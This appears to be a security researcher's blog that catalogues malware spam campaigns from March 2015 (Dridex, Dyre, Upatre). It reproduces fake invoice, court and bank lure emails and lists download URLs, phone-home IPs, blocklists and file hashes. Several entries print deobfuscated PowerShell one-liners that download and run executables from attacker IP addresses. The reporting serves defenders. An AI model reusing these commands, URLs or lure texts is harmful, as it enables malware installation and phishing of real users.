Sponsored by..

Tuesday, 31 March 2015

Malware spam: "Your PO: SP14619" / "Sam S. [sales@alicorp.com]"

This fake financial spam comes with a malicious attachment:

From:    Sam S. [sales@alicorp.com]
Date:    31 March 2015 at 07:45
Subject:    Your PO: SP14619

Your PO No: SP14619 for a total of $ 13,607.46
has been sent to New Era Contract Sales Inc. today.

A copy of the document is attached

Regards,
New Era Contract Sales Inc.'s Document Exchange Team
In the sample I have seen, the attachment is APIPO1.doc with a VirusTotal detection rate of 5/56, and it contains this malicious macro [pastebin] which downloads a component from:

http://xianshabuchang.com/54/78.exe

which is saved as %TEMP%\kkaddap7b.exe. This malicious executable has a detection rate of 3/56. Various analysis tools [1] [2] [3] show that it phones home to the following IPs:

91.230.60.219 (Docker Ltd / ArtVisio Ltd, Russia)
185.91.175.39 (Webstyle Group LLC / Rohoster / MnogoByte, Russia)
46.101.38.178 (Digital Ocean, Netherlands)
87.236.215.103 (OneGbits, Lithuania)
66.110.179.66 (Microtech Tel, US)
176.108.1.17 (Cadr-TV LLE TVRC, Ukraine)
202.44.54.5 (World Internetwork Corporation, Thailand)
128.199.203.165 (DigitalOcean Cloud, Singapore)

According to the Malwr report it drops another version of itself called edg1.exe [VT 2/56] and what appears to be a Dridex DLL [VT 3/56].

Recommended blocklist:
91.230.60.0/24
185.91.175.0/24
46.101.38.178
87.236.215.103
66.110.179.66
176.108.1.17
202.44.54.5
128.199.203.165

MD5s:
f5ecc500c2b74612e33c0522104fb999
716d1dc7285b017c2dbc146dbb2e319c
2cb0f18ba030c1ab0ed375e4ce9c0342
6218264a6677a37f7e98d8c8bd2c13e9

UPDATE:
A couple of reports from Payload Security [1] [2]  also give some insight into the malware, including an additional but well-known IP to block:

95.163.121.178 (Digital Networks CJSC aka DINETHOSTING, Russia)



Wednesday, 25 March 2015

Malware spam: "Invoice ID:12ab34" / "123"

This terse spam has a malicious attachment:
From:    Gerry Carpenter
Date:    25 March 2015 at 12:58
Subject:    Invoice ID:34bf33

123
There is an Excel attachment with the same semi-random reference number as the subject (in the sample I saw it was 34bf33.xls) which currently has zero detections. Unlike most recent document-based attacks, this does not contain a macro, but instead has an embedded OLE object that will run a VBscript if clicked, the spreadsheet itself is designed to get the victim to click-and-run that object.


Automated analysis doesn't show very much, but it does show the screenshots [1] [2]. I haven't been able to extract the VBscript in a neat enough format, but what did interest me is this novel obfuscation [pastebin] which actually just executes this:

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile  -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.221/zxr/ssidin.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; Start-Process %TEMP%\JIOiodfhioIH.exe;
Despite all the mucking about with expanding a CAB file, the downloaded file is actually an EXE file all along so nothing is done to it. This file has a detection rate of 7/56, and the Payload Security report shows it communicating with the following IPs:

92.63.88.83 (MWTV, Latvia)
82.151.131.129 (DorukNet, Turkey)
121.50.43.175 (Tsukaeru.net, Japan)


The payload is most likely Dridex.

Recommended blocklist:
92.63.88.0/24
82.151.131.129
121.50.43.175


MD5s:
ce130212d67070459bb519d67c06a291
461689d449c7b5a905c8404d3a464088

Malware spam: "James Dudley [James.Dudley@hitec.co.uk]" / "Payment 1142"

This spam email is yet another forgery pretending to be from a wholly legitimate company. It is one of a series of emails spoofing Cambridgeshire firms, and it comes with a malicious attachment.

From:    James Dudley [James.Dudley@hitec.co.uk]
Date:    25 March 2015 at 09:38
Subject:    Payment 1142

Payment sheet attached.

James

T    01353 624023
F    01353 624043

Hitec Ltd
23 Regal Drive
Soham
Ely
Cambs
CB7 5BE


This message has been scanned for viruses and malicious content by Green Duck SpamLab 
I have only seen a single sample of this, with an attachment Payment 1142.doc which has a VirusTotal detection rate of 5/57. It contains this malicious macro [pastebin] which attempts to download a component from:

http://madasi.homepage.t-online.de/dbcfg/32.exe

..which is then saved as %TEMP%\sollken1.2.8.exe, this has a detection rate of 12/57. Automated analysis of this binary is pending, but is so far inconclusive.

Incidentally, the macro contains this snippet:

' (File name: AddNewSheet.bas)
' Author: SENOO, Ken
' LICENSE: CC0
' (Last update: 2015-03-10T18:38+09:00)


All that means is that this Ken Senoo created and freely licensed a Visual Basic module that the bad guys are using. It does not mean that they have anything at all to do with this malware attack.

MD5s:
8f79a24970d9e7063ffcedc9a8d23429
02cfa3e6fdb4301528e5152de76b2abf

UPDATE: this interesting new tool from Payload Security gives some insight as to what the malware does. In particular, it phones home to:

50.31.1.21 (Steadfast Networks, US)
87.236.215.103 (OneGbits, Lithuania)
2.6.14.246 (Orange S.A., France)
14.96.207.127 (Tata Indicom, India)
95.163.121.178 (Digital Networks aka DINETHOSTING, Russia)


Recommended blocklist:
50.31.1.21
87.236.215.103
2.6.14.246
14.96.207.127
95.163.121.0/24

Tuesday, 24 March 2015

Malware spam: "Notice to Appear" / "Notice to appear in Court #0000310657"

These two emails come with a malicious attachment:

From:    County Court [lester.hicks@whw0095.whservidor.com]
Date:    24 March 2015 at 16:45
Subject:    AERO, Notice to Appear

This is to inform you to appear in the Court on the March 31 for your case hearing.
Please, prepare all the documents relating to the case and bring them to Court on the specified date.
Note: The case may be heard by the judge in your absence if you do not come.

You can review complete details of the Court Notice in the attachment.

Yours faithfully,
Lester Hicks,
Court Secretary.


-------------

From:    District Court [cody.bowman@p3nw8sh177.shr.prod.phx3.secureserver.net]
Date:    24 March 2015 at 16:44
Subject:    AERO, Notice to appear in Court #0000310657

Dear Aero,

This is to inform you to appear in the Court on the March 28 for your case hearing.
You are kindly asked to prepare and bring the documents relating to the case to Court on the specified date.
Note: If you do not come, the case will be heard in your absence.

You can review complete details of the Court Notice in the attachment.

Sincerely,
Cody Bowman,
District Clerk.

In these two case the attachments were named Court_Notification_0000310657.zip and Notice_to_Appear_000283436.zip containing the malicious scripts Court_Notification_0000310657.doc.js [VirusTotal 7/57] [pastebin] [deobfuscated] and Notice_to_Appear_000283436.doc.js [VirusTotal 6/57] [pastebin] [deobfuscated] respectively.

These scripts attempt to download malicious code from the following sites:

pitfaa.nidhog.com
ilarf.net
gurutravel.co.nz
lawyermyowin.com
www.lead.com.co

Details in the download locations vary, but are in the format:

ilarf.net/document.php?rnd=1161&id=
gurutravel.co.nz/document.php?rnd=3022&id=

This leads to a randomly-named file with a GIF extension which is actually one of two malicious EXE files, with detection rates of 6/57 and 4/56. One of those produces a valid Malwr report, the other smaller EXE doesn't seem to do anything.

The executable that seems to do something POSTs to a Turkish server at 176.53.125.25 (Radore Veri Merkezi Hizmetleri A.S.). Various Malwr reports [1] [2] [3] [4] [5] [6] indicate badness on at least the following IPs:

176.53.125.20
176.53.125.21
176.53.125.22
176.53.125.23
176.53.125.24
176.53.125.25


I would suggest blocking at least those IPs, or perhaps 176.53.125.16/28 or if you don't mind blocking access to a few legitimate Turkish sites you could perhaps block 176.53.125.16/24.

I am not 100% certain of the payload, however some servers in that cluster have been fingered for serving the Trapwot fake anti-virus software.

MD5s:
2d65371ac458c7d11090aca73566e3d4
da63f87243a971edca7ecd214e6fdeb1
77d8670f80c3c1de81fb2a1bf05a84b5
d48ef4bb0549a67083017169169ef3ee


Malware spam: "Mary Watkins [mary@elydesigngroup.co.uk]" / "Invoice"

This spam email message does not come from Ely Design Group, but is in fact just a simple forgery. Ely Design Group's systems have not been compromised in any way. This email comes with a malicous attachment.

From:    Mary Watkins [mary@elydesigngroup.co.uk]
Date:    24 March 2015 at 07:23
Subject:    Invoice

Hi,

As promised!

--
Mary Watkins
Office Manager
Ely Design Group
Attached is a Word document named S22C-6e15031710060.doc which has a low detection rate of 2/57 which contains this malicious macro [pastebin] which then downloads a component from the following location:

http://dogordie.de/js/bin.exe

The file is saved as %TEMP%\PALmisc2.5.2.exe and has a VirusTotal detection rate of 6/57.

Automated analysis tools [1] [2] [3] [4] [5] indicate that the binary crashes in those test environments. although whether or not it will work on a live PC is another matter. The payload (if it works) is almost definitely the Dridex banking trojan.

Friday, 20 March 2015

Something evil on 85.143.216.102 and 94.242.205.101

I will confess that I don't have much information on what this apparent exploit kit is or how it works, but there seems to be something evil on 94.242.205.101 (root SA, Luxembourg) [VT report] being reached via 85.143.216.102 (AirISP, Russia) [VT report].

Whatever it is, it is using subdomains from hijacked GoDaddy accounts [1] [2] which is a clear sign of badness. The hijacked GoDaddy domains change very quickly, but these have all been used in the past day or so on both those IPs:

dchsleep.com
manymike.com
vladeasa.com
ezdockparts.com
suurtampere.com
visikreatif.com
josemiguelez.com
reformapenal.com
axwaydropzone.com
capitolskopje.com
theantennapub.com
faceofsustengo.com
niagarajournal.com
crystalbeachhill.com
ezdockadirondacks.com
ezdockfingerlakes.com
chambel.info
lidifaria.info
ewwebinars.co
cybercoaching.co
ewwebinars.com
eyouthcounseling.com
ecounselingnation.com
epastoralcounseling.com
extraordinaryfamilies.com
drtim.net
drclinton.net
ewomencast.net
ecounseling.net
drtimclinton.net
ecouplecounseling.net
biblicalcoachingtoday.net
drclinton.org

For practical purposes though I recommend you block traffic to the IPs rather than the domains.

Recommended blocklist:
85.143.216.102
94.242.205.101

UPDATE:
These following nearby IPs have also been distributing badness. I recommend you block these too:
85.143.216.103
94.242.205.98

Thursday, 19 March 2015

Malware spam: "Invoice ID:987654321 in attachment." from random senders

This spam has no body text and a randomly-generated sender name and invoice ID number. Sample subjects include:

Invoice ID:07dda8035 in attachment.
Invoice ID:09bf252 in attachment.
Invoice ID:108df399 in attachment.
Invoice ID:11847972 in attachment.
Invoice ID:156a35519 in attachment.
Invoice ID:16bb539 in attachment.
Invoice ID:16de0833 in attachment.
Invoice ID:17ff9887 in attachment.
Invoice ID:19b5b30 in attachment.

Sample senders:

Angelia Oliver
Annette Hunter
Austin Bennett
Belinda Cameron
Brittney Dixon
Buster Nolan
Candace Bowers
Christian Kemp
Clarissa Gentry
Cruz Mcintosh
Doug Haney
Dylan Poole
Erwin Hale
Gordon Downs
Hallie Neal
Oscar Bradshaw
Reyna Carver
Rosalie Acevedo
Sid Alston
Sophia Scott
Tanner Puckett
Tia Kline
Trudy Hensley
Valerie Delaney
Ivy Stokes
Jeanie Frye
Karin Frank
Kayla Travis
Mai Rowland
Marilyn Fleming
Minerva Glover

The Word document contains an embedded OLE object that leads to a malicious VBA macro. The payload is exactly the same as the one used in this attack.


Malware spam: "Aspiring Solicitors Debt Collection" has mystery XML attachment

This spam has a malicious attachment.

Date:    19 March 2015 at 12:52
Subject:    Aspiring Solicitors Debt Collection

Aspiring Solicitors

Ref : 195404544
Date : 02.10.2014
Dear Sir, Madam
Re: Our Client Bank of Scotland PLC
Account Number:77666612
Balance:       2,345.00
We are instructed by Bank of Scotland PLC in relation to the above matter.

You are required to pay the balance of GBP 2,345.00 in full within 7(seven) days from the date of this email to avoid Country Court proceedings being issued against you. Once proceedings have been issued, you will be liable for court fees and solicitors costs detailed below.

Court Fees  GBP 245.00

Solicitors Costs  GBP 750.00

Cheques or Postal Orders should be  made payable to Bank of Scotland PLC and sent to the address in attachment below quoting the above account number.
We are instructed by our Client that they can accept payment by either Debit or Credit Card.If you wish to make a payment in this wa, then please contact us with your Card details. We will then pass these details on to our Client in order that they may process your agreed payment. Kindly note that any payment made will be shown on your Bank and/or Credit Card Statement as being made to Bank of Scotland PLC
If you have any queries regarding this matter or have a genuine reason for non payment, you should contact us within 7 days from the date of this email to avoid legal proceedings being issued against you, by filling the contact us form in attachment below.

Yours faithfully,
Shawn Ballard
Aspiring Solicitors

Department CCD, Box 449
Upper Ground Floor
1-5 Queens Road Quadrant
Brighton
BN1 3XJ
United Kingdom
Attached is a file with a random numerical name (e.g. 802186031.doc) which is in fact a malicious XML file that appears to drop the Dridex banking trojan. Indication are that this can run even with macros disabled. Each attachment has a unique MD5.

Analysis is currently pending, this appears to have several new techniques to avoid detection. According to this Twitter conversation one version attempts to download a binary from 91.226.93.51/smoozy/shake.exe although this is currently timing out for me. For security analysts, a sample of the XML file can be found here.

IMPORTANT: if you have opened this document in Word then there is a good chance that you are infected. I would recommend that you shut down any machine that has opened this. Anti-virus detections are currently very poor, but vendors may have signature available soon, I would wait 24 hours before attempting to disinfect any infected machine. Dridex collects banking passwords, so it is important that machines are not used for financial transactions.

UPDATE:

This particular attack uses some novel features. Opening the Word document reveals what appears to be an embedded XLS file:

There's some interesting metadata.. created by "Dredex" of "Ph0enix Team", then modified by "ПРроываААА".


In the typical attack scenario, opening the embedded file will force the macro to run. In this case, I used LibreOffice on a Linux box which does not support VBA. This revealed the malicious code, which looks like this.

A bit of copy-and-pasting reveals nothing more sophisticated than some Base 64 encoded text that attempts to run one of the following commands:
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.199/smoozy/shake.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://91.226.93.51/smoozy/shake.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://91.227.18.76/smoozy/shake.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://176.31.28.244/smoozy/shake.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
FYI, those IPs are allocated as follows:

193.26.217.199 (Servachok Ltd, Russia)
91.226.93.51 (Sobis OOO, Russia)
91.227.18.76 (Eximius LLC, Russia)
176.31.28.244 (OVH, France / Bitweb LLC, Russia)

"shake.exe" has a VirusTotal detection rate of 3/57. Between that VirusTotal report and this Malwr report we can see the malware attempting to connect to:

95.163.121.33 (Digital Networks aka DINETHOSTING, Russia)
87.236.215.105 (OneGbits, Lithuania)
31.160.233.212 (KPN Zakelijk Internet, Netherlands)

Further analysis is pending.

Recommended blocklist:
193.26.217.199
91.226.93.51
91.227.18.76
176.31.28.244
95.163.121.0/24
87.236.215.105
31.160.233.212





Malware spam: "sales@marflow.co.uk" / "Your Sales Order"

This spam run pretends to come from Marflow Engineering but it doesn't, instead it is a simple forgery. Marflow are not sending out this email, nor have their systems been compromised in any way.

From:    sales@marflow.co.uk
Date:    19 March 2015 at 09:13
Subject:    Your Sales Order

Your order acknowledgment is attached.

Please check carefully and advise us of any issues.

Best regards

Marflow
Attached is a file 611866.xls which appears to come in at least three different versions. But due to an error in the way the spam has been created, the attachment is actually corrupt and (depending on your version of Excel) attempting to open it gives this error:


The file you are trying to open, '611866.xls', is in a different format than specified by the file extension. Verify that the file is not corrupted and is from a trusted source before opening the file. Do you want to open the file now?
Clicking OK loads up what looks like gobbledegook.


If you see this, then you have had a lucky escape because the attachment is in the wrong format and is Base 64 encoded. If you manually run a Base 64 decoder against it then you end up with a malicious XLS file, in one of three different flavours with low detection rates [1] [2] [3] which in turn each contain a slightly different malicious macro [1] [2] [3] which then attempt to download from the following locations:

http://www.lenhausen.de/js/bin.exe
http://meostore.net/js/bin.exe
http://mvw1919.de/js/bin.exe

This is saved in the %TEMP% folder under the filenames pirit86.exe, tikapom64.exe and Trekaldo51.exe (although the binary is the same in each case). This malicious binary has a detection rate of just 2/57 and according to the Malwr report, it phone home to the following IPs:

37.139.47.81 (Pirix, Russia)
5.100.249.215 (OMC Computers & Communications, Israel)
195.162.107.7 (Gamma Telecom, UK)
131.111.37.221 (University of Cambridge, UK)
198.245.70.182 (Deniz Toprak, Turkey / B2 Net Solutions, US)
210.205.74.43 (DAEMINCUSTOM, Korea)
46.228.193.201 (Aqua Networks Ltd, Germany)

It also drops another version of the downloader, edg1.exe which has a detection rate of 1/56 and a DLL with a detection rate of also of 1/57. The payload is the Dridex banking trojan.

Recommended blocklist:
37.139.47.0/24
5.100.249.215
195.162.107.7
131.111.37.221
198.245.70.182
210.205.74.43
46.228.193.201


Wednesday, 18 March 2015

Malware spam: "JP Morgan Access [Carrie.Tolstedt@jpmorgan.com]" / "FW: Customer account docs"

This fake financial spam comes with a malicious attachment.


From:    JP Morgan Access [Carrie.Tolstedt@jpmorgan.com]
Date:    18 March 2015 at 17:49
Subject:    FW: Customer account docs


JP Morgan

We have received the following documents regarding your account, if you would like to confirm the changes please check / view the documents please click here.


Carrie Tolstedt
Carrie L. Tolstedt
Carrie.Tolstedt@chase.com
Senior Executive Vice President
Community Banking
J.P. Morgan Treasury and Securities Services

This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this information is strictly prohibited.


As it happens, Carrie L Tolstedt is a real executive... at Wells Fargo. The lady in the picture is another Wells Fargo employee entirely.

But anyway, this is a simple forgery containing a link to a file at Cubby which downloads as Documents_JP3922PV8.zip and contains a malicious file Documents_JP3922PV8.exe which has a icon to make it look like an Adobe acrobat file.

The executable has a low VirusTotal detection rate of 3/57.  Various automated analysis tools [1] [2] [3] [4] show the malware downloading additional components from:

bej-it-solutions.com/pvt/ixusn.rtf
capslik.com/mandoc/ixusn.rtf


It then attempts to POST data to an IP at 109.230.131.95 (Vsevnet Ltd. Russia) which is a critical IP to block if you want to protect yourself against this type of Upatre / Dyre attack.

The Malwr report also shows that amongst other things it downloads an executable lwxzqrk36.exe which has a detection rate of just 2/57. That Malwr report also shows that it downloads and pops up a PDF about drone strikes.

Source: malwr.com
Presumably this PDF pops up to make the victim think that they have been duped into opening some politically-themed spam. Instead, they have actually installed the Dyre banking trojan.. in other words, the victim may well think that it is nothing serious when it really is.

The download locations for this Upatre/Dyre combination change all the time, but the IP address of 109.230.131.95  has been around for a little while. Also, it is a characteristic of this malware that it calls out to checkip.dyndns.org to determine the client IP address.. monitoring for traffic going to that location can be a useful indicator of infection.


ssssssssssss

Malware spam: "Your online Gateway.gov.uk Submission"

This spam leads to a malicious ZIP file hosted either on Dropbox or Cubby.

From:    Gateway.gov.uk
Date:    18 March 2015 at 13:19
Subject:    Your online Gateway.gov.uk Submission

Electronic Submission Gateway

Thank you for your submission for the Government Gateway.
The Government Gateway is the UK's centralized registration service for e-Government services.

To view/download your form to the Government Gateway please visit http://www.gateway.gov.uk/file/s/gdvzk7toum8ghnc/SecureDocument.zip?dl=1

This is an automatically generated email. Please do not reply as the email address is not
monitored for received mail.

gov.uk - the best place to find government services and information - Opens in new window

The best place to find government services and information
The link leads to an archive file Avis_De_Paiement.zip which in turn contains a malicious binary Avis_De_Paiement.scr which has a VirusTotal detection rate of 16/57. ThreatExpert and Comodo CAMAS report that it downloads components from the following locations:

canabrake.com.mx/css/doc11.rtf
straphael.org.uk/youth2000_files/doc11.rtf


My sources indicate that this most likely phones home to 109.230.131.95 (Vsevnet Ltd. Russia) which is a known bad IP that I recommend blocking. The payload appears to be the Upatre downloader leading to the Dyre banking trojan.

Malware spam: "December unpaid invoice notification"

This spam comes with no body text, but does come with a malicious attachment.

From:    Korey Mack
Date:    18 March 2015 at 11:04
Subject:    December unpaid invoice notification
So far I have only seen a single sample with an attached file called 11IDJ325.doc which is undetected by AV vendors. Inside is a malicious macro [pastebin] with an encrypted section that executes this:
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://176.31.28.244/smoozy/shake.exe','%TEMP%\huiUGI8t8dsF.cab'); expand %TEMP%\huiUGI8t8dsF.cab %TEMP%\huiUGI8t8dsF.exe; start %TEMP%\huiUGI8t8dsF.exe;
Although the EXE file from 176.31.28.244 (OVH, France / Bitweb LLC, Russia) is downloaded as a CAB file and then EXPANDed to an EXE, there is in fact no file transformation happening at all (which is odd). This executable has a detection rate of 2/57.

This Malwr report shows it downloading a DLL with an MD5 of a40e588e614e6a4c9253d261275288bf [VT 4/57] which is the same payload as found in this earlier spam run, along with another executable with an MD5 of 409397f092d3407f95be42903172cf06 which is not in the VirusTotal database. The report also shows the malware phoning home to the following IPs:

31.25.77.154 (Call U Communications, Palestine)
95.163.121.33 (Digital Networks CJSC aka DINETHOSTING, Russia)
188.165.5.194 (OVH, Ireland)
188.165.26.237 (OVH, Latvia)
115.241.60.56 (Reliance Communication, India)
46.19.143.151 (Private Layer INC, Switzerland)

Recommended blocklist:
31.25.77.154
95.163.121.0/24
188.165.5.194
188.165.26.237
115.241.60.56
46.19.143.151
176.31.28.244



Malware spam: "Confirmation of Booking" / "NWN Media Ltd" / "Della Richardson"

This spam is not from NWN Media Ltd but is instead a simple forgery sent out to random email addresses with a malicious attachment. NWN Media are not responsible for this spam, nor have their systems been compromised.

From:    della.richards2124@nwn.co.uk [della.richards@nwn.co.uk]
Date:    18 March 2015 at 08:34
Subject:    Confirmation of Booking

This booking confirmation forms a binding contract between yourselves and NWN Media Ltd.
If you do not agree with any of the details above then please contact the named sales representative on the above number immediately.


Yours sincerely,

Della
NWN Media Ltd
Attached is a file NWN Confirmation Letter.doc which I have so far seen in two different versions, both with low detection rates [1] [2] which contain slightly different malicious macros [1] [2] which then go and download a malicious binary from one of the following locations:

http://pmmarkt.de/js/bin.exe
http://deosiibude.de/deosiibude.de/js/bin.exe

These are saved as %TEMP%\zakilom86.exe and %TEMP%\Pikadlo64.exe respectively. The binaries are actually identical and have a VirusTotal detection rate of 5/57. According to the Malwr report this binary attempts to communicate with the following IPs:

31.41.45.211 (Relink Ltd, Russaia)
109.234.159.250 (Selectel Ltd, Russia)
37.59.50.19 (OVH, France)
62.76.179.44 (Clodo-Cloud / IT House, Russia)
95.163.121.200 (Digital Networks CSJC aka DINETHOSTING / Russia)

It then drops what appears to be another version of itself called edg1.exe onto the target system [VT 2/55] along with a malicious Dridex DLL [VT 3/55]

Recommended blocklist:
31.41.45.211
109.234.159.250
37.59.50.19
62.76.179.44
95.163.121.0/24



Saturday, 14 March 2015

Quttera fails and spews false positives everywhere

By chance, I found out that my blog had been blacklisted by Quttera. No big deal, because it happens from time-to-time due to the nature of the content on the site. But I discovered that it isn't just my blog, but Quttera also block industry-leading sites such as Cisco, VMWare, Sophos, MITRE, AVG and Phishtank.

For example, at the time of writing the following domains are all blacklisted by Quttera (clicking the link shows the current blacklisting status):

www.cisco.com
www.vmware.com
cve.mitre.org
www.auscert.org.au
www.phishtank.com
www.buzzfeed.com
www.reddit.com
dl.dropbox.com
www.avg.com
www.malekal.com
nakedsecurity.sophos.com
blog.dynamoo.com
malware-traffic-analysis.net
blog.malwaremustdie.org

Cisco's blacklisting entry looks like this:

Now, you can ask Quttera to unblacklist your site for free by raising a ticket but the most prominent link leads to a paid service for £60/year. Hmmm.

I don't think that I will rush to subscribe to that. Obviously, something is seriously wrong with the algorithm in use, some of these sites should obviously be whitelisted. Quttera also doesn't understand the different between a malicious domain or IP being mentioned and such a site being linked to or injected into a site.

I guess there are many, many more domains that are in a similar situation. Perhaps you might want to check your own web properties and share your findings in the comments?

Friday, 13 March 2015

Malware spam: "Invoice (13\03\2015) for payment to COMPANY NAME"

There is a series of malware spams in progress in the following format:

Invoice (13\03\2015) for payment to JUPITER PRIMADONA GROWTH TRUST
Invoice (13\03\2015) for payment to CARD FACTORY PLC
Invoice (13\03\2015) for payment to CELTIC
Invoice (13\03\2015) for payment to MIRADA PLC

Note the use of the backslash in the date. There is an attachment in the format 1234XYZ.doc which I have seen three different variants of (although one of those was zero length), one of which was used in this spam run yesterday and one new one with zero detections which contains this malicious macro, which downloads another component from:

http://95.163.121.186/api/gbb1.exe

This is saved as %TEMP%\GHjkdfg.exe - incidentally, this server is wide open and is full of data and binaries relating to the Dridex campaign. Unsurprisingly, it is hosted on a Digital Networks CJSC aka DINETHOSTING IP address. This binary has a detection rate of 3/53 and the Malwr report shows it phoning home to 95.163.121.33 which is also in the same network neighbourhood.

The binary also drops a malicious Dridex DLL with a detection rate of 5/56. This is the same DLL as used in this spam run earlier today.

Recommended blocklist:
95.163.121.0/24

Malware spam: "pentafoods.com" / "Invoice: 2262004"

This fake Penta Foods spam run is another variant of this and it comes with a malicious attachment. Penta Foods are not sending this email, instead it is a simple forgery.

From:    cc18923@pentafoods.com
Date:    13 March 2015 at 07:50
Subject:    Invoice: 2262004

Please find attached invoice :  2262004
  Any queries please contact us.

--
Automated mail message produced by DbMail.
Registered to Penta Foods, License MBA2009357.

Attached is a Word document R-1179776.doc which actually comes in two version, both with zero detection rates, contains one of two malicious macros [1] [2] which then download a component from the following locations:

http://accalamh.aspone.cz/js/bin.exe
http://awbrs.com.au/js/bin.exe

This is saved as %TEMP%\fJChjfgD675eDTU.exe and has a VirusTotal detection rate of 5/57. Automated analysis tools [1] [2] show a phone-home attempt to:

62.76.179.44 (Clodo-Cloud / IT House, Russia)

My sources also indicate that it phones home to:

212.69.172.187 (Webagentur, Austria)
78.129.153.12 (iomart / RapidSwitch, UK)

According to this Malwr report it also drops a DLL with a detection rate of just 2/57 which is probably Dridex.

Recommended blocklist:
62.76.179.44
212.69.172.187
78.129.153.12


Thursday, 12 March 2015

Malware spam: "Invoice [1234XYZ] for payment to COMPANY NAME"

These rather terse emails appear to refer to various companies, and all come with a malicious attachment:

From:    Erasmo Small
Date:    12 March 2015 at 09:40
Subject:    Invoice [3479XZM] for payment to INCOME & GROWTH VCT PLC(THE)

From:    Eli Ramirez
Date:    12 March 2015 at 08:37
Subject:    Invoice [4053FJK] for payment to RANDGOLD RESOURCES

From:    Richard Baxter
Date:    12 March 2015 at 08:37
Subject:    Invoice [3020JQM] for payment to TARSUS GROUP PLC

From:    Megan Dennis
Date:    12 March 2015 at 09:36
Subject:    Invoice [4706CEZ] for payment to SHANKS GROUP

The attachment is a Word document with a name that matches the reference in the subject. So far, I have seen two different versions of this with low detection rates [1] [2] which contain these malicious macros [1] [2] [pastebin] which contain some quite entertaining obfuscation, but when deobfuscated try to download an additional component from the following locations:

https://92.63.88.102/api/gb1.exe
https://85.143.166.124/api/gb1.exe

Note the use of HTTPS. Those two IP addresses belong to:

92.63.88.102 (MWTV, Latvia)
85.143.166.124 (Pirix, Russia)


Both are well-known hosts for this sort of rubbish. According to the Malwr report this attempts to phone home to:

95.163.121.33 (Digital Networks CJSC aka DINETHOSTING, Russia)

Digital Networks is also a sea of crap. It also drops a Dridex DLL with a detection rate of 9/57.

Recommended blocklist:
95.163.121.0/24
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
85.143.166.0/24


Wednesday, 11 March 2015

Malware spam: "Voicemail Message (07813297716) From:07813297716"

When was the last time someone sent you a voice mail message by email? Never? There are no surprises to find that this spam email message has a malicious attachment.
From:     Voicemail admin@victimdomain
Date:     11/03/2015 11:48
Subject:     Voicemail Message (07813297716) From:07813297716

IP Office Voicemail redirected message

Attachment: MSG00311.WAV.ZIP
The attachment is a ZIP file containing a malicious EXE file called MSG00311.WAV.exe which has a VirusTotal detection rate of 5/57. According to the Malwr report, it pulls down another executable and some config files from:

http://wqg64j0ei.homepage.t-online.de/data/log.exe
http://cosmeticvet.su/conlib.php

This behaviour is very much like a Dridex downloader, a campaign that has mostly been using malicous macros rather than EXE-in-ZIP attacks.

The executable it drops has a detection rate of 2/54 and these Malwr reports [1] [2] show a further component download from:

http://muscleshop15.ru/js/jre.exe
http://test1.thienduongweb.com/js/jre.exe


This component has a detection rate of 5/57. According to the Malwr report for that we see (among other things) that it drops a DLL with a detection rate of 4/57 which is the same Dridex binary we've been seeing all day.

Piecing together the IP addresses found in those reports combined with some information from one of my intelligence feeds, we can see that the following IPs are involved in this activity:

31.41.45.211 (Relink Ltd, Russia)
62.213.67.115 (Caravan Telecom, Russia)
80.150.6.138 (Deutsche Telekom, Germany)
42.117.1.88 (FPT Telecom Company, Vietnam)
188.225.77.242 (TimeWeb Co. Ltd., Russia)
212.224.113.144 (First Colo GmbH, Germany)
37.59.50.19 (OVH, France)
62.76.179.44 (Clodo-Cloud, Russia)
95.163.121.200 (Digital Networks CJSC aka DINETHOSTING, Russia)
185.25.150.33 (NetDC.pl, Poland)
104.232.32.119 (Net3, US)
188.120.243.159 (TheFirst.RU, Russia)

Recommended blocklist:
31.41.45.211
62.213.67.115
80.150.6.138
42.117.1.88
188.225.77.242
212.224.113.144
37.59.50.19
62.76.179.44
95.163.121.0/24
185.25.150.3
104.232.32.119
188.120.243.159




Malware spam: Message from "RNP0026735991E2" / "inv.09.03"

This pair of spam emails are closely related and have a malicious attachment:

From:    admin.scanner@victimdomain
Date:    11 March 2015 at 08:49
Subject:    Message from "RNP0026735991E2"

This E-mail was sent from "RNP0026735991E2" (MP C305).

Scan Date: 11.03.2015 08:57:25 (+0100)
Queries to: admin.scanner@victimdomain

Attachment: 201503071457.xls
----------

From:    Jora Service [jora.service@yahoo.com]
Date:    11 March 2015 at 09:27
Subject:    inv.09.03

Attachment: INV 86-09.03.2015.xls

Neither XLS attachment is currently detected by AV vendors [1] [2] and they contain two related but slightly different macros [1] [2] which download a component from the following locations:

http://koschudu.homepage.t-online.de/js/bin.exe
http://03404eb.netsolhost.com/js/bin.exe

